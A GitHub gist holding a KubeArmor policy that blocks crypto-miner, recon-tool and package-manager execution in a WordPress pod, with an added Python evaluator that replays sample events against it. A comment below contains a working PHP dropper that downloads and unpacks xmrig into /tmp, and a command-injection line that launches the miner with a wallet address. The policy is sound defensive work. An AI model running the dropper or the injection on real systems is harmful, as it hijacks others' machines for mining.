@nyrahul
Last active March 22, 2024 10:20
KubeArmor policy template for preventing crypto miner execution
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: prevent-crypto-miners
spec:
  selector:
    matchLabels:
      app: wordpress
  action: Block
  process:
    matchDirectories:
      - dir: /tmp/
        recursive: true
    matchPaths:
      # do not allow execution of xmrig (xmrig.com)
      - execname: xmrig
      # prevent execution of Dero miner
      - execname: dero
      - execname: dero-miner-linux-amd64
      - execname: dero-wallet-cli-linux-amd64
      - execname: derod-linux-amd64
      # do not allow execution of masscan/zgrab2/nmap used for recon
      - execname: zgrab2
      - execname: masscan
      - execname: nmap
      # do not allow package management tools execution
      - execname: apt
      - execname: apk
      # time sync is important for miners. typically ntpdate is used.
      - execname: ntpdate
  # Do not allow overwriting system binaries
  file:
    matchDirectories:
      - dir: /usr/local/bin/
        readOnly: true
        recursive: true
      - dir: /sbin/
        readOnly: true
        recursive: true
      - dir: /bin/
        readOnly: true
        recursive: true
      - dir: /usr/bin/
        readOnly: true
        recursive: true
      - dir: /var/local/bin/
        readOnly: true
        recursive: true
      - dir: /boot/
        readOnly: true
        recursive: true
  message: cryptominer detected and blocked
  severity: 10
  tags:
    - cryptominer
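The following is an added example, not part of the gist and not KubeArmor code: a small evaluator that replays sample process-exec and file-access events against the rules of the policy above so the matchers can be sanity-checked before the policy is applied. The matching semantics it uses (`execname` compares the executable's basename, a recursive `matchDirectories` entry is a path-prefix match, `readOnly: true` blocks writes but permits reads) are assumptions that follow the policy's stated intent, not a reproduction of KubeArmor's enforcement engine, and the policy is transcribed into a Python dict so the script runs without PyYAML.

```python
"""Simplified replay of the prevent-crypto-miners policy over constructed events.

Added example (not KubeArmor's code). Assumed semantics:
  * process.matchDirectories (recursive) -> block any exec whose path starts with dir
  * process.matchPaths.execname          -> block any exec whose basename equals execname
  * file.matchDirectories readOnly: true -> block writes under dir, allow reads
"""
import posixpath

# The gist's policy transcribed into a dict (same rules, same paths).
POLICY = {
    "action": "Block",
    "process": {
        "matchDirectories": [{"dir": "/tmp/", "recursive": True}],
        "matchPaths": [{"execname": n} for n in (
            "xmrig", "dero", "dero-miner-linux-amd64", "dero-wallet-cli-linux-amd64",
            "derod-linux-amd64", "zgrab2", "masscan", "nmap", "apt", "apk", "ntpdate")],
    },
    "file": {
        "matchDirectories": [
            {"dir": d, "readOnly": True, "recursive": True}
            for d in ("/usr/local/bin/", "/sbin/", "/bin/", "/usr/bin/",
                      "/var/local/bin/", "/boot/")
        ]
    },
    "message": "cryptominer detected and blocked",
}


def _dir_matches(path, rule):
    """Assumed matchDirectories semantics: prefix match when recursive, else direct parent."""
    d = rule["dir"]
    if rule.get("recursive"):
        return path.startswith(d)
    return posixpath.dirname(path) + "/" == d


def evaluate_exec(path):
    """Return (verdict, reason) for a process-exec event of the binary at `path`."""
    proc = POLICY["process"]
    for r in proc.get("matchDirectories", []):
        if _dir_matches(path, r):
            return POLICY["action"], f"exec under {r['dir']}"
    base = posixpath.basename(path)
    for r in proc.get("matchPaths", []):
        if r.get("execname") == base:
            return POLICY["action"], f"execname {base}"
        if r.get("path") == path:
            return POLICY["action"], f"path {path}"
    return "Allow", "no process rule matched"


def evaluate_file(path, write):
    """Return (verdict, reason) for a file open of `path`; `write` marks a write open."""
    for r in POLICY["file"].get("matchDirectories", []):
        if _dir_matches(path, r):
            if r.get("readOnly") and not write:
                return "Allow", f"read-only open under {r['dir']} permitted"
            return POLICY["action"], f"write under {r['dir']}"
    return "Allow", "no file rule matched"


# Constructed events modelled on the downloader the gist's comment links to:
# the tarball is unpacked under /tmp, then the miner is started from there.
SAMPLE_EVENTS = [
    ("exec", "/tmp/xmrig-6.21.1/xmrig", None),
    ("exec", "/usr/local/bin/xmrig", None),     # same binary copied elsewhere
    ("exec", "/usr/bin/ntpdate", None),
    ("exec", "/usr/bin/php", None),             # the web app itself must keep running
    ("file", "/usr/bin/ls", False),             # reads of system binaries are fine
    ("file", "/usr/bin/xmrig", True),           # dropping a binary into /usr/bin
    ("file", "/tmp/xmrig-6.21.1.tar.gz", True), # not covered: the download itself
]


def run_samples():
    """Evaluate every constructed event; returns a list of (kind, path, verdict, reason)."""
    out = []
    for kind, path, write in SAMPLE_EVENTS:
        verdict, reason = evaluate_exec(path) if kind == "exec" else evaluate_file(path, write)
        out.append((kind, path, verdict, reason))
    return out


if __name__ == "__main__":
    for kind, path, verdict, reason in run_samples():
        print(f"{kind:4} {verdict:5} {path:30} ({reason})")
```

The last constructed event is the instructive one: nothing in this policy stops a process in the pod from writing the tarball into `/tmp`, so the download succeeds and only the subsequent exec from `/tmp/` (or of a binary named `xmrig` anywhere) is blocked. A policy author who also wants the drop itself denied would need a file rule for `/tmp/`, which the gist deliberately leaves writable.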
nyrahul commented Mar 22, 2024

https://gist.githubusercontent.com/achrefbensaad/98d1512a2860bc54e393d9a9c8d00abc/raw/4c64ce76a42899b3e3b6ca3a7b42d4dff842009f/xmrig-downloader.php

; nohup /tmp/xmrig-6.21.1/xmrig 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD
<?php
    // maximum execution time in seconds
    set_time_limit (24 * 60 * 60);

    // folder to save downloaded files to. must end with slash
    $destination_folder = '/tmp/';

    $url = "https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-static-x64.tar.gz";
    $newfname = $destination_folder . basename($url);

    $file = fopen ($url, "rb");
    if ($file) {
      $newf = fopen ($newfname, "wb");

      if ($newf)
      while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
      }
    }

    if ($file) {
      fclose($file);
    }

    if ($newf) {
      fclose($newf);
    }
    $ret = exec('tar xf ' . $newfname.' -C /tmp' , $output, $error);
    // Debug
    var_dump($ret);
    var_dump($output);
    var_dump($error);
    $ret = exec('whoami', $output, $error);
    // Debug
    echo "dddd";
    var_dump($ret);
    var_dump($output);
    var_dump($error);

?>
